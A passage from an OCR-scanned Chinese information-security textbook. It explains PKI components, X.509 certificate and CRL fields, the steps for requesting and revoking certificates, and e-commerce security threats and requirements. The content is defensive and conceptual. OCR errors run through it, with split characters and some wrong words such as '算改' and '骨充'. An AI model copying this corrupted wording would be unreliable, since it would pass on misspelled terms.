管理 数字 证 书 。CA 主要 由 注册 服务 器 .注册 机 构 负责 证 书 申请 受理 审核 (Registry 
Authority,RA) 和 认证 中 心服 务 器 3 部 分 组 成 。 

2. 证 书库 

证 书库 就 是 证 书 的 集中 存放 地 ,包括 LDAP 目录 服务 器 和 普通 数据 库 , 用 于 对 用 户 申 
请 、 证 书 、 密 钥 .CRL 和 日 志 等 信息 进行 存储 和 管理 ,并 提供 一 定 的 查询 功能 。 一 般 来 说 ,为 
了 获得 及 时 的 服务 ,证 书库 的 访问 和 查询 操作 时 间 必 须 尽 量 的 短 ,证书 和 证 书 撤销 信息 必须 
尽量 小 ,这 样 才能 减少 总 共 要 消耗 的 网 络 带宽 。 

3. 密 钥 备份 及 恢复 系统 

如 果 用 户 丢 失 了 用 于 解密 数据 的 密 钥 , 则 密 文 数据 将 无 法 被 解密 ,造成 数据 的 丢失 。 为 
了 避免 这 种 情况 的 出 现 ,PKI 应 该 提供 备份 与 恢复 解 秘 密 钥 的 机 制 。 密 钥 的 备份 与 恢复 应 
该 由 可 信 的 机 构 来 完成 ,认证 中 心 (CA) 可 以 充当 这 一 角色 。 

4. 证 书 作废 处 理 系统 

证 书 作废 处 理 系统 是 PKI 的 一 个 重要 的 组 件 。 同 日 常生 活 中 的 各 种 证 件 一 样 ,证 书 在 
CA 为 其 签署 的 有 效 期 以 内 也 可 能 需要 作废 。 为 实现 这 一 点 ,PKI 必须 提供 作废 证 书 的 一 
系列 机 制 。 作 废 证 书 一 般 通 过 将 证 书 列 入 作废 证 书 列表 (CRL) 来 完成 。 证 书 的 作废 处 理 必 
须 在 安全 及 可 验证 的 情况 下 进行 ,系统 还 必须 保证 CRL 的 完整 性 。 

5. 应 用 接口 

PKI 的 价值 在 于 使 用 户 能 够 方便 地 使 用 加 密 、 数 字 签 名 等 安全 服务 ,因此 ,一 个 完整 的 
PKI 必须 提供 良好 的 应 用 接口 系统 ,使 得 各 种 各 样 的 应 用 能 够 以 安全 ,一 致 , 可 信 的 方式 与 
PKI 交互 ,确保 所 建立 起 来 的 网 络 环境 的 可 信 性 ,同时 降低 管理 维护 成 本 。 


260 信息 安全 与 技术 (第 2 版 ) 


10.4.3 数字 证 书 


数字 证 书 是 网 络 用 户 身 份 信息 的 一 系列 数据 ,用 来 在 网 络 通信 中 识别 通信 各 方 的 身份 。 
1978 年 Kohnfelder 在 其 学 士 论文 “发 展 一 种 实用 的 公 钥 密码 系统 ”中 第 一 次 引入 了 数字 证 
书 的 概念 。 数 字 证 书包 含 ID、 公 钥 和 颁发 机 构 的 数字 签名 等 内 容 。 

数字 证 书 的 形式 主要 有 X. 509 公 钥 证 书 、 简 单 PKI(Simple Public Key Infrastructure) 
证 书 .PGP(Pretty Good Privacy) 证 书 和 属性 (attribute) 证 书 。 

1. 数字 证 书 的 格式 

为 保证 证 书 的 真实 性 和 完整 性 ,证 书 均 由 其 颁发 机 构 进行 数字 签名 。X. 509 公 钥 证 
是 专 为 Internet 的 应 用 环境 而 制定 的 ,但 很 多 建议 都 可 以 应 用 于 企业 环境 。 第 3 版 的 证 二 
结构 如 下 所 述 。 

(1) 版 本 号 (version number) : 标示 证 书 的 版 本 (如 版 本 1 .版 本 2 或 版 本 3) 。 

(2) 序列 号 (serial number) : 由 证 书 颁发 者 分 配 的 本 证 书 的 唯一 标识 符 。 特 定 CA 颁 
发 的 每 一 个 证 书 的 序列 号 都 是 唯一 的 。 

(3) 签名 (signature) : 签名 算法 标识 符 ( 由 对 象 标识 符 加 上 相关 参数 组 成 ) 用 于 说 明 本 
证 书 所 用 的 数字 签名 算法 ,同时 还 包括 该 证 书 的 实际 签名 值 。 例 如 ,典型 的 签名 算法 标识 符 
“MD5WithRSAEncription” 表 明 采 用 的 散 列 算法 是 MD5( 由 RSA Labs 定义 ), 采 用 的 加 密 
算法 是 RSA 算法 。 

(4) 颁发 者 (issuer) : 用 于 标识 签发 证 书 的 认证 机 构 , 即 证 书 颁发 者 的 可 识别 名 (DN)， 
这 是 必须 说 明 的 。 

(5) 有 效 期 (validity) : 证 书 有 效 的 时 间 段 ,由 开始 日 期 (Not Valid Before) 和 终止 日 期 
(NotValid After) 两 项 组 成 。 日 期 分 别 由 UTC 时 间或 一 般 的 时 间 表 示 。 

(6) 主体 (subject) : 证 书 持 有 者 的 可 识别 名 ,此 字段 必须 是 非 空 的 ,除非 使 用 了 其 他 的 
名 字形 式 ( 参 见 后 文 的 扩展 字段 ) 。 

(7) 主体 公 钥 信息 (subject public key information) : 主体 的 公 钥 及 算法 标识 符 ,这 一 项 
是 必需 的 。 

(8) 颁发 者 唯一 标识 符 (issuer unique identifier) : 证 书 颁 发 者 可 能 重 名 ,该 字段 用 于 唯 
一 标识 的 该 颁发 者 , 仅 用 于 版 本 2 和 版 本 3 的 证 书 中 ,属于 可 选项 。 

(9) 主体 唯一 标识 符 (subject unique identifier) : 证 书 持 有 者 可 能 重 名 ,该 字段 用 于 唯 
一 标识 的 该 持 有 者 , 仅 用 于 版 本 2 和 版 本 3 的 证 书 中 ,属于 可 选项 。 

(10) 扩展 Cextension) : 扩展 增加 了 证 书 使 用 的 灵活 性 ,能 够 在 不 改变 证 书 格式 的 情况 
下 ,在 证 书 中 加 入 额外 的 信息 。 扩 展 项 分 为 标准 扩展 和 专用 扩展 ,标准 扩展 由 X. 509 定义 ， 
专用 扩展 可 以 由 任何 组 织 自行 定义 。 因 此 ,不 同 组织 机 构 定 义 和 接 受 的 专用 扩展 集 各 不 
相同 。 

证 书 扩展 包括 一 个 标记 ,用 于 指示 该 扩展 是 否 必须 是 关键 扩展 。 关 键 标 志 的 普遍 含义 
是 : 当 它 的 值 为 真 时 ,表明 该 扩展 必须 被 处 理 。 如 果 证 书 用 户 不 能 识别 或 者 不 能 处 理 含有 
关键 标志 的 证 书 , 则 必须 认为 该 证 书 无 效 。 如 果 一 个 扩展 未 被 标记 为 关键 扩展 ,那么 证 书 用 
户 可 以 忽略 该 扩展 。 


起 
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2. 证 书 撤销 列表 


证 书 撤销 列表 (Certificate Revocation List,CRL) 又 称 为 证 书 黑 名 单 。 证 书 是 有 期 限 
的 ,只 有 在 有 效 期 内 才 是 有 效 的 。 但 是 ,在 特殊 情况 下 ,如 密 钥 泄露 或 工作 调动 时 ,必须 强制 
使 该 相关 证 书 失效 。 证 书 撤销 的 方法 很 多 ,其 中 最 常用 的 方法 是 由 权威 机 构 定期 发 布 证 书 
撤销 列表 。 证 书 撤销 列表 的 格式 如 下 所 述 。 

(1) CRL 的 版 本 号 : 0 表示 X. 509 vl 标准 ; 1 表示 X. 509 v2 标准 。 目 前 常用 的 是 同 
X. 509 v3 证 书 对 应 的 CRL v2 版 本 。 

(2) 签名 (signature) : 包含 算法 标识 和 算法 参数 ,用 于 指定 证 书签 发 机 构 对 CRL 内 容 
进行 签名 的 算法 。 

(3) 颁发 者 (issuer) : 签发 机 构 的 DN 名 ,由 国家 、 省 市 .地 区 、 组 织 机 构 、 单 位 部 门 和 通 
用 名 等 组 成 。 

(4) 本 次 更 新 (the update): 此 次 CRL 签发 时 间 ,遵循 ITU-T X. 509 v2 标准 的 CA 在 
2049 年 之 前 把 这 个 域 编码 为 UTC Time 类 型 ,在 2050 年 或 2050 年 之 后 把 这 个 域 编码 为 
Generalized Time 类 型 。 

(5) 下 次 更 新 (next update): 下 次 CRL 签发 时 间 ,遵循 ITU-T X. 509 v2 标准 的 CA 
在 2049 年 之 前 把 这 个 域 编码 为 UTC Time 类 型 ,在 2050 年 或 2050 年 之 后 把 这 个 域 编码 为 
Generalized Time 类 型 。 

(6) 撤销 的 证 书 列表 (certificate revocation list) : 撤销 的 证 书 列表 ,每 个 证 书 对 应 一 个 
唯一 的 标识 符 ( 即 它 含 有 已 撤销 证 书 的 唯一 序列 号 ,不 是 实际 的 证 书 )。 在 列表 中 的 每 一 项 
都 含有 该 证 书 被 撤销 的 时 间作 为 可 选项 。 

(7) 扩展 (extension): 在 CRL 中 也 可 包含 扩展 项 来 说 明 更 详尽 的 撤销 信息 。 

3. 证 书 的 存放 

数字 证 书 作为 一 种 电子 数据 ,可 以 直接 从 网 上 下 载 ,也 可 以 通过 其 他 方式 获得 。 

(1) 使 用 IC 卡 存放 用 户 证 书 : 即 把 用 户 的 数字 证 书写 到 IC 卡 中 ,供用 户 随身 携带 。 

(2) 用 户 证 书 直接 存放 在 磁盘 或 自己 的 终端 上 : 用 户 将 从 CA 申请 来 的 证 书 下 载 或 复 
制 到 磁盘 或 自己 的 PC 或 智能 终端 上 , 当 用 户 使 用 时 ,直接 从 终端 读 和 人 即 可 。 

(3) CRL 一 般 通 过 网 上 下 载 的 方式 存储 在 用 户 端 。 

4. 证 书 的 申请 和 撤销 

证 书 的 申请 有 两 种 方式 : 一 是 在 线 申请 ; 二 是 离线 申请 。 在 线 申请 就 是 利用 浏览 器 或 
其 他 应 用 系统 通过 在 线 的 方式 来 申请 证 书 ,这 种 方式 一 般 用 于 申请 普通 用 户 证 书 或 测试 证 
书 。 离 线 申请 一 般 通过 人 工 的 方式 直接 到 证 书 机 构 证 书 受理 点 去 办 理 证 书 申请 手续 ,通过 
审核 后 获取 证 书 , 这 种 方式 一 般 用 于 比较 重要 的 场合 ,如 服务 器 证 书 和 商家 证 书 等 。 下 面 讨 
论 的 主要 是 在 线 申请 方式 。 

当 证 书 申请 时 ,用 户 先 使 用 浏览 器 通过 Internet 访问 安全 服务 器 ,下 载 CA 的 数字 证 书 
(又 称 为 根 证 书 ); 然后 注册 机 构 服 务 器 对 用 户 进行 身份 审核 ,认可 后 便 批 准 用 户 的 证 书 申 
请 ; 最 后 操作 员 对 证 书 申请 表 进 行 数字 签名 ,并 将 申请 及 其 签名 一 起 提交 给 CA 服务 器 。 

CA 操作 员 获 得 注册 机 构 服务 器 操作 员 签 发 的 证 书 申请 ,可 以 发 行 证 书 或 者 拒绝 发 行 
证 书 , 然 后 将 证 书 通过 硬 复制 的 方式 传输 给 注册 机 构 服 务 器 。 注 册 机 构 服 务 器 得 到 用 户 的 
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证 书 以 后 将 用 户 的 一 些 公 开 信 息 和 证 书 放 到 LDAP 服务 器 上 提供 目录 浏览 服务 ,并 且 通 过 
电子 邮件 的 方式 通知 用 户 从 安全 服务 器 上 下 载 证 书 。 用 户 根据 邮件 的 提示 到 指定 的 网 址 上 
下 载 自己 的 数字 证 书 , 而 其 他 用 户 可 以 通过 LDAP 服务 器 获得 他 的 公 钥 数字 证 书 。 

证 书 申请 的 步骤 如 下 。 

(1) 用 户 申请 。 用 户 首先 下 载 CA 的 数字 证 书 , 然 后 在 证 书 的 申请 过 程 中 使 用 SSL 安 
全 方式 与 服务 器 建立 连接 ,用 户 填写 个 人 信息 ,浏览 器 生成 私 钥 和 公 钥 对 ,将 私 钥 保存 至 客 
户 端 特定 的 文件 中 ,并 且 要 求 用 口令 保护 私 钥 , 同 时 将 公 钥 和 个 人 信息 提交 给 安全 服务 器 。 
安全 服务 器 将 用 户 的 申请 信息 传送 给 注册 机 构 服 务 器 。 

(2) 注册 机 构 审 核 。 用 户 与 注册 机 构 人 员 联 系 , 证 明 自 己 的 真实 身份 ,或 者 请 求 代 理 人 
与 注册 机 构 联 系 。 注 册 机 构 操 作 员 利用 自己 的 浏览 器 与 注册 机 构 服 务 器 建立 SSL 安全 通 
信 , 该 服务 器 需要 对 操作 员 进 行 严 格 的 身份 认证 ,包括 操作 员 的 数字 证 书 、IP 地 址 ,为 了 进 
一 步 保 证 安全 性 ,可 以 设置 固定 的 访问 时 间 。 操 作 员 首先 查看 目前 系统 中 的 申请 人 员 , 从 列 
表 中 找 出 相应 的 用 户 , 单 击 用 户 名 ,核对 用 户 信息 ,并 且 可 以 进行 适当 的 修改 。 如 果 操 作 员 
同意 用 户 申请 证 书 请 求 , 则 必须 对 证 书 申请 信息 进行 数字 签名 ;操作 员 也 有 权利 拒绝 用 户 的 
申请 。 

操作 员 与 服务 器 之 间 的 所 有 通信 都 采用 加 密 和 签名 ,具有 安全 性 、 抗 否认 性 ,保证 了 系 
统 的 安全 性 和 有 效 性 。 

(3) CA 发 行 证 书 。 注 册 机 构 RA 通过 硬 复制 的 方式 向 CA 传输 用 户 的 证 书 申请 与 操 
作 员 的 数字 签名 ,CA 操作 员 查 看 用 户 的 详细 信息 ,并且 验 证 操作 员 的 数字 签名 。 如 果 签 名 
验证 通过 , 则 同意 用 户 的 证 书 请 求 ,颁发 证 书 , 然 后 CA 将 证 书 输出 。 如 果 CA 操作 员 发 现 
签名 不 正确 , 则 拒绝 证 书 申请 。CA 颁发 的 数字 证 书 中 包含 关于 用 户 及 CA 自身 的 各 种 信 
息 , 如 能 唯一 标识 用 户 的 姓名 及 其 他 标识 信息 、 个 人 的 E-mail 地 址 .证 书 持 有 者 的 公 钥 。 公 
钥 用 于 为 证 书 持 有 者 加 密 敏 感 信息 ,签发 个 人 证 书 的 认证 机 构 的 名 称 、 个 人 证 书 的 序列 号 和 
个 人 证 书 的 有 效 期 (证 书 有 效 起 止 日 期 ) 等 。 

(4) 注册 机 构 证 书 转 发 。 注 册 机 构 RA 操作 员 从 CA 处 得 到 新 的 证 书 , 首 先 将 证 书 输 
出 到 LDAP 目录 服务 器 以 提供 目录 浏览 服务 ; 然后 操作 员 向 用 户 发 送 一 封 电 子 邮 件 , 通 知 
用 户 证 书 已 经 发 行 成 功 ,并 且 把 用 户 的 证 书 序列 号 告诉 用 户 , 由 用 户 到 指定 的 网 址 去 下 载 自 
己 的 数字 证 书 ; 最 后 告诉 用 户 如 何 使 用 安全 服务 器 上 的 LDAP 配置 ,让 用 户 修 改 浏览 器 的 
客户 端 配 置 文件 ,以 便 访问 LDAP 服务 器 ,获得 他 人 的 数字 证 书 。 

(5) 用 户 证 书 获取 。 用 户 使 用 申请 证 书 时 的 浏览 器 到 指定 的 网 址 ,输入 自己 的 证 书 序 
列 号 。 服 务 器 要 求 用 户 必须 使 用 申请 证 书 时 的 浏览 器 ,因为 浏览 器 需要 用 该 证 书 相 应 的 私 
钥 去 验证 数字 证 书 , 只 有 保存 了 相应 私 钥 的 浏览 器 ,才能 成 功 下 载 用 户 的 数字 证 书 。 这 时 用 
户 打 开 浏 览 器 的 安全 属性 ,就 可 以 发 现 自己 已 经 拥有 了 CA 颁发 的 数字 证 书 , 可 以 利用 该 数 
字 证 书 与 其 他 人 及 Web 服务 器 (拥有 相同 CA 颁发 的 证 书 ) 使 用 加 密 、 数 字 签 名 进行 安全 
通信 。 

认证 中 心 还 涉及 CRL 的 管理 。 用 户 向 特定 的 操作 员 ( 仅 负责 CRL 的 管理 ) 发 一 份 加 密 
签名 的 邮件 ,声明 自己 希望 撤销 证 书 。 操 作 员 打开 邮件 ,填写 CRL 注册 表 , 并 且 进 行 数字 签 
名 ,提交 给 CA ,CA 操作 员 验 证 注册 机 构 操 作 员 的 数字 签名 ,批准 用 户 撤销 证 书 ,并 且 更 新 
CRL。 然 后 CA 将 不 同 格式 的 CRL 输出 给 注册 机 构 ,公布 到 安全 服务 器 上 ,这 样 其 他 人 可 
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以 通过 访问 服务 器 得 到 CRL。 

证 书 撤销 流程 步骤 如 下 。 

(1) 用 户 向 注册 机 构 操 作 员 CRL Manager 发 送 一 封 签名 加 密 的 邮件 ,声明 自己 自愿 撤 
销 证 书 。 

(2) 注册 机 构 同 意 证 书 撤销 ,操作 员 输 入 用 户 的 序列 号 ,对 请 求 进行 数字 签名 。 

(3) CA 查询 证 书 撤销 请 求 列 表 , 选 出 其 中 的 一 个 ,验证 操作 员 的 数字 签名 ,如果 正 确 ， 
则 同意 用 户 的 证 书 撤销 申请 ,同时 更 新 CRL 列表 ,然后 将 CRL 以 多 种 格式 输出 。 

(4) 注册 机 构 转 发 证 书 撤销 列表 。 操 作 员 导入 CRL, 以 多 种 不 同 的 格式 将 CRL 公布 
手套 

(5) 用 户 浏览 安全 服务 器 ,下 载 或 浏览 CRL。 

在 一 个 PKI, 特 别 是 CA 中 ,信息 的 存储 是 一 个 核心 问题 , 它 包括 两 个 方面 : 一 方面 是 
CA 服务 器 利用 数据 库 来 备份 当前 密 钥 和 归档 过 期 密 钥 ,该 数据 库 需 高 度 安全 和 机 密 , 其 安 
全 等 级 同 CA 本 身 相 同 ; 另 一 方面 是 目录 服务 器 ,用 于 分 发 证 书 和 CRL ,一 般 采用 LDAP 目 
录 服 务 器 。 


10.5 电子 商务 安全 技术 


10.5.1 电子 商务 安全 问题 


电子 商务 的 安全 问题 ,主要 是 在 开放 的 网 络 环境 中 如 何 保 证 信息 传递 中 的 完整 性 、 可 靠 
性 真实 性 ,以 及 预防 未 经 授权 的 非法 入 侵 者 等 方面 的 问题 上 。 而 解决 这 些 问题 主要 是 表现 
在 技术 上 ,并 在 采用 和 实施 这 些 技术 的 经 济 可 行 性 上 。 这 方面 的 问题 是 电子 商务 安全 考虑 
和 研究 的 主要 问题 。 简 单 讲 ,一 是 技术 上 的 安全 性 ; 二 是 安全 技术 的 实用 可 行 性 。 大 量 的 
事实 表明 ,安全 是 电子 商务 的 关键 问题 。 安 全 得 不 到 保障 ,即使 使 用 Internet 再 方便 ,电子 
商务 也 无 法 得 到 广大 用 户 的 认可 。 

1. 电子 商务 的 安全 隐患 

与 现实 商务 不 同 , 参 与 电子 商务 的 各 方 不 需要 面对面 来 进行 商务 活动 ,信息 流 和 资金 流 
都 是 通过 Internet 来 传输 。 而 Internet 是 一 个 向 全 球 用 户 开 放 的 巨大 网 络 ,其 技术 上 的 缺 
陷 和 用 户 使 用 中 的 不 良 习 惯 ,使 得 电子 商务 中 的 信息 流 和 资金 流 在 通过 Internet 传输 时 , 存 
在 着 许多 安全 隐患 ,这 就 是 电子 商务 的 安全 问题 。 

(1) 中 断 系统 一 一 破坏 系统 的 有 效 性 。 网 络 故障 、 操 作 错 误 .应 用 程序 错误 、 硬 件 故 障 、 
系统 软件 错误 及 计算 机 病毒 都 能 导致 系统 不 能 正常 工作 ,因而 要 对 由 此 所 产生 的 潜在 威胁 
加 以 控制 和 预防 ,以 保证 贸易 数据 在 确定 的 时 刻 、 确 定 的 地 点 是 有 效 的 。 

(2) 窃听 信息 一 一 破坏 系统 的 机 密 性 。 电 子 商务 作为 贸易 的 一 种 手段 ,其 信息 直接 代 
表 着 个 人 、 企 业 或 国家 的 商业 机 密 。 传 统 的 纸 面 贸易 都 是 通过 邮寄 封装 的 信件 或 通过 可 靠 
的 通信 渠道 发 送 商业 报 文 来 达到 保守 机 密 的 目的 。 电 子 商务 是 建立 在 一 个 较为 开放 的 网 络 
环境 上 的 ,维护 商业 机 密 是 电子 商务 全 面 推广 应 用 的 重要 保障 。 因 此 ,要 预防 通过 搭 线 和 电 
磁 泄露 等 手段 造成 信息 泄露 或 者 对 业务 流量 进行 分 析 从 而 获取 有 价值 的 商业 情报 等 一 切 
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损害 系统 机 密 性 的 行为 。 

(3) 算 改 信息 一 一 破坏 系统 的 完整 性 。 电 子 商 务 简化 了 贸易 过 程 ,减少 了 人 为 的 干预 ， 
同时 也 带 来 维护 贸易 各 方 商业 信息 的 完整 .统一 的 问题 。 由 于 数据 输入 时 的 意外 差错 或 欺 
诈 行 为 ,可 能 导致 贸易 各 方 信息 的 差异 。 此 外 ,数据 传输 过 程 中 信息 的 丢失 ,信息 重复 或 信 
息 传 送 的 次 序 差异 也 会 导致 贸易 各 方 信息 的 不 同 。 贸 易 各 方 信息 的 完整 性 将 影响 到 贸易 各 
方 的 交易 和 经 营 策略 ,保持 贸易 各 方 信息 的 完整 性 是 电子 商务 应 用 的 基础 。 因 此 ,要 预防 对 
信息 的 随意 生成 .修改 和 删除 ,同时 要 防止 数据 传送 过 程 中 信息 的 丢失 和 重复 并 保证 信息 传 
送 次 序 的 统一 。 

(4) 伪造 信息 一 一 破坏 系统 的 可 靠 性 、 真 实 性 。 电 子 商务 可 能 直接 关系 到 贸易 双方 的 
商业 交易 ,如何 确定 要 进行 交易 的 贸易 方正 是 进行 交易 所 期 望 的 贸易 方 这 一 问题 则 是 保证 
电子 商务 顺利 进行 的 关键 。 在 传统 的 纸 面 贸易 中 ,贸易 双方 通过 在 交易 合同 .契约 或 贸易 单 
据 等 书面 文件 上 手写 签名 或 印章 来 鉴别 贸易 伙伴 ,确定 合同 契约. 单 据 的 可 靠 性 并 预防 抵 
赖 行为 的 发 生 。 这 也 就 是 人 们 常 说 的 “ 白 纸 黑 字 ”。 在 无 纸 化 的 电子 商务 方式 下 ,通过 手写 
签名 和 印章 进行 贸易 方 的 鉴别 已 是 不 可 能 的 。 因 此 ,要 在 交易 信息 的 传输 过 程 中 为 参与 交 
易 的 个 人 、 企 业 或 国家 提供 可 靠 的 标识 。 

2. 电子 商务 给 交易 双方 带 来 的 安全 威胁 

在 传统 交易 过 程 中 ,买卖 双方 是 面对面 的 ,因此 很 容易 保证 交易 过 程 的 安全 性 和 建立 起 
信任 关系 。 但 在 电子 商务 过 程 中 ,买卖 双方 是 通过 网 络 来 联系 的 ,而 且 彼此 远 隔 千 山 万 水 。 
由 于 互联 网 既 不 安全 ,也 不 可 信 , 因 此 建立 交易 双方 的 安全 和 信任 关系 相当 困难 。 电 子 商 务 
交易 双方 (销售 者 和 购买 者 ) 都 面临 不 同 的 安全 威胁 。 

对 销售 者 而 言 , 他 面临 的 安全 威胁 主要 有 以 下 几 种 。 

(1) 中 央 系 统 安 全 性 被 破坏 。 入 侵 者 假冒 成 合法 用 户 来 改变 用 户 数据 (如 商品 送 达 地 
址 ) ,解除 用 户 订单 或 生成 虚假 订单 。 

(2) 竞争 者 检索 商品 递送 状况 。 恶 意 竞争 者 以 他 人 的 名 义 来 订购 商品 ,从 而 了 解 有 关 
商品 的 递送 状况 和 货物 的 库存 情况 。 

(3) 客户 资料 被 竞争 者 获悉 。 

(4) 被 他 人 假冒 而 损害 公司 的 信誉 。 不 诚实 的 人 建立 与 销售 者 服务 器 名 字 相 同 的 另 一 


个 服务 器 来 假冒 销售 者 。 
(5) 消费 者 提交 订单 后 不 付款 。 
(6) 虚假 订单 。 


(7) 获取 他 人 的 机 密 数据 。 例 如 , 某 人 想 要 了 解 另 一 人 在 销售 商 处 的 信誉 时 ,他 以 另 一 
人 的 名 字 向 销售 商 订购 昂贵 的 商品 ,然后 观察 销售 商 的 行动 。 假 如 销售 商 认 可 该 订单 , 则 说 
明 被 观察 者 的 信誉 高 ; 否则 , 则 说 明 被 观察 者 的 信誉 不 高 。 

对 购买 者 而 言 ,他 面临 的 安全 威胁 主要 有 以 下 几 种 。 

(1) 虚假 订单 。 一 个 假冒 者 可 能 会 以 客户 的 名 字 来 订购 商品 ,而 且 有 可 能 收 到 商品 ,而 
此 时 客户 却 被 要 求 付款 或 返还 商品 。 

(2) 付款 后 不 能 收 到 商品 。 在 要 求 客户 付款 后 ,销售 商 中 的 内 部 人 员 不 将 订单 和 钱 转 
发 给 执行 部 门 ,因而 使 客户 不 能 收 到 商品 。 

(3) 机 密 性 丧失 。 客 户 有 可 能 将 秘密 的 个 人 数据 或 自己 的 身份 数据 (如 账号 ` 口 令 等 ) 
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发 送 给 冒充 销售 商 的 机 构 ,这 些 信息 也 可 能 会 在 传递 过 程 中 被 窃取 。 
(4) 拒绝 服务 。 攻 击 者 可 能 向 销售 商 的 服务 器 发 送 大 量 的 虚假 定单 来 穷竭 它 的 资源 ， 
从 而 使 合法 用 户 不 能 得 到 正常 的 服务 。 


10.5.2 电子 商务 安全 需求 


电子 商务 安全 问题 的 核心 和 关键 是 电子 交易 的 安全 性 。 由 于 Internet 本 身 的 开放 性 及 
目前 网 络 技 术 发 展 的 局 限 性 ,使 网 上 交易 面临 着 种 种 安全 性 威胁 ,也 由 此 提出 了 相应 的 安全 
控制 要 求 。 

1. 身份 的 可 认证 性 

身份 的 可 认证 性 是 指 交易 双方 在 进行 交易 前 应 能 鉴别 和 确认 对 方 的 身份 。 在 传统 的 交 
易 中 ,交易 双方 往往 是 面对面 进行 活动 的 ,这 样 很 容易 确认 对 方 的 身份 。 即 使 开始 不 熟悉 、 
不 能 确信 对 方 , 也 可 以 通过 对 方 的 签名 .印章 .证书 等 一 系列 有 形 的 身份 凭证 来 鉴别 他 的 身 
份 。 另 外 ,在 传统 的 交易 中 如 果 是 采用 电话 进行 通信 ,也 可 以 通过 声音 信号 来 识别 对 方 身 
份 。 然 而 ,参与 网 上 交易 的 双方 往往 素 不 相识 甚至 相隔 万 里 ,并 且 在 整个 交易 过 程 中 都 可 能 
不 见 一 面 。 因 此 ,如 果 不 采取 任何 新 的 保护 措施 ,就 要 比 传 统 的 商务 更 容易 引起 假冒 .诈骗 
等 违法 活动 。 例 如 ,在 进行 网 上 购物 时 ,对 于 客户 来 说 ,如 何 确信 计算 机 屏幕 上 显示 的 页 面 
就 是 大 家 所 说 的 那个 有 名 的 网 上 商店 ,而 不 是 居心 不 良 的 黑客 骨 充 的 呢 ? 同样 ,对 于 商家 来 
说 ,怎样 才能 相信 正在 选 购 商品 的 客户 不 是 一 个 骗子 ,而 是 一 个 当 发 生意 外 事件 时 能 够 承担 
责任 的 客户 呢 ? 

因此 ,电子 交易 的 首要 安全 需求 就 是 要 保证 身份 的 可 认证 性 。 这 就 意味 着 ,在 双方 进行 
交易 前 ,首先 要 能 确认 对 方 的 身份 ,要 求 交易 双方 的 身份 不 能 被 假冒 或 伪装 。 

2. 信息 的 保密 性 

信息 的 保密 性 是 指 对 交换 的 信息 进行 加 密 保 护 , 使 其 在 传输 过 程 或 存储 过 程 中 不 被 他 
人 所 识别 。 在 传统 的 贸易 中 ,一 般 都 是 通过 面对面 的 信息 交换 ,或 者 通过 邮寄 封装 的 信件 或 
可 靠 的 通信 渠道 发 送 商 业 报 文 ,达到 保守 商业 机 密 的 目的 。 而 电子 商务 是 建立 在 一 个 开放 
的 网 络 环境 下 , 当 交 易 双 方 通过 Internet 交换 信息 时 ,因为 Internet 是 一 个 开放 的 公用 互联 
网 络 ,如 果 不 采 取 适 当 的 保密 措施 ,那么 其 他 人 就 有 可 能 知道 他 们 的 通信 内 容 。 另 外 ,存储 
在 网 络 上 的 文件 信息 如 果 不 加密 的 话 ,. 也 有 可 能 被 黑客 窃取 。 上 述 种 种 情况 都 有 可 能 造成 
敏感 商业 信息 的 泄露 ,导致 商业 上 的 巨大 损失 。 例 如 ,如 果 客 户 的 信用 卡 的 账号 和 用 户 名 被 
人 知悉 ,就 可 能 被 盗用 ; 如 果 企业 的 订货 和 付款 的 信息 被 竞争 对 手 获悉 ,就 可 能 丧失 商机 。 

因此 ,电子 商务 另 一 个 重要 的 安全 需求 就 是 信息 的 保密 性 。 这 意味 着 ,一 定 要 对 人 敏感 重 
要 的 商业 信息 进行 加 密 , 即 使 别人 截获 或 窃取 了 数据 ,也 无 法 识别 信息 的 真实 内 容 , 这 样 就 
可 以 使 商业 机 密 信息 难以 被 泄露 。 

3. 信息 的 完整 性 

信息 的 完整 性 是 指 确 保 信息 在 传输 过 程 中 的 一 致 性 ,并 且 不 被 未 经 授权 者 所 算 改 ,也 称 
不 可 修改 性 。 上 面 所 讨论 的 信息 保密 性 ,是 针对 网 络 面临 的 被 动 攻击 一 类 威胁 而 提出 的 安 
全 需求 ,但 它 不 能 避免 针对 网 络 所 采用 的 主动 攻击 一 类 的 威胁 。 所 谓 被 动 攻击 ,就 是 不 修改 
任何 交易 信息 ,但 通过 截获 、 窃 取 、 观 察 、 监 听 、 分 析 数 据 流 获得 有 价值 的 情报 。 而 主动 攻击 
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就 是 算 改 交易 信息 ,破坏 信息 的 完整 性 和 有 效 性 ,以 达到 非法 的 目的 。 例 如 ,在 电子 贸易 中 ， 
乙 给 甲 发 了 如 下 一 份 报 文 :“ 请 给 丁 汇 100 元 钱 , 乙 .” 报 文 在 报 发 过 程 中 经 过 了 丙 之 手 , 丙 
就 把 “ 丁 ” 改 为 “ 丙 ”"。 这 样 甲 收 到 后 就 成 了 “请 给 丙 汇 100 元 钱 , 乙 ”结果 是 丙 而 不 是 丁 得 到 
了 100 元 钱 。 当 乙 得 知 丁 未 收 到 钱 时 就 去 问 甲 , 甲 出 示 有 乙 签名 的 报 文 , 乙 发 现 报 文 被 算 
改 了 。 

因此 ,保证 信息 的 完整 性 也 是 电子 商务 活动 中 的 一 个 重要 的 安全 需求 。 这 意味 着 ,交易 
各 方 能 够 验证 收 到 的 信息 是 否 完整 , 即 信息 是 否 被 人 算 改 过 ,或 者 在 数据 传输 过 程 中 是 否 出 
现 信息 丢失 、 信 息 重复 等 差错 。 

4. 不 可 抵赖 性 

交易 的 不 可 抵赖 性 是 指 交易 双方 在 网 上 交易 过 程 的 每 个 环节 都 不 可 和 否认 其 所 发 送 和 收 
到 的 交易 信息 ,又 称 不 可 否认 性 。 由 于 商情 千变万化 ,交易 合同 一 旦 达成 就 不 能 抵赖 。 在 传 
统 的 贸易 中 ,贸易 双方 通过 在 交易 合同 、 契 约 或 贸易 单据 等 书面 文件 上 手写 签名 或 印章 , 确 
定 合同 、 契 约 、. 单 据 的 可 靠 性 并 预防 抵赖 行为 的 发 生 , 这 也 就 是 人 们 常 说 的 * 白 纸 黑 字 ”。 但 
在 无 纸 化 的 电子 交易 中 ,就 不 可 能 再 通过 传统 的 手写 签名 和 印章 来 预防 抵赖 行为 的 发 生 。 
因此 ,必须 采用 新 的 技术 ,防止 电子 商务 中 的 抵赖 行为 ; 否则 就 会 引起 商业 纠纷 ,使 电子 商 
务 无 法 顺利 进行 。 例 如 ,在 电子 商务 活动 中 订购 计算 机 时 ,如 果 订 货 时 计算 机 价格 较 低 ,但 
收 到 订单 后 ,计算 机 价格 上 涨 了 ,假如 供应 商 能 否认 收 到 订单 的 事实 , 则 采购 商 就 会 蒙受 损 
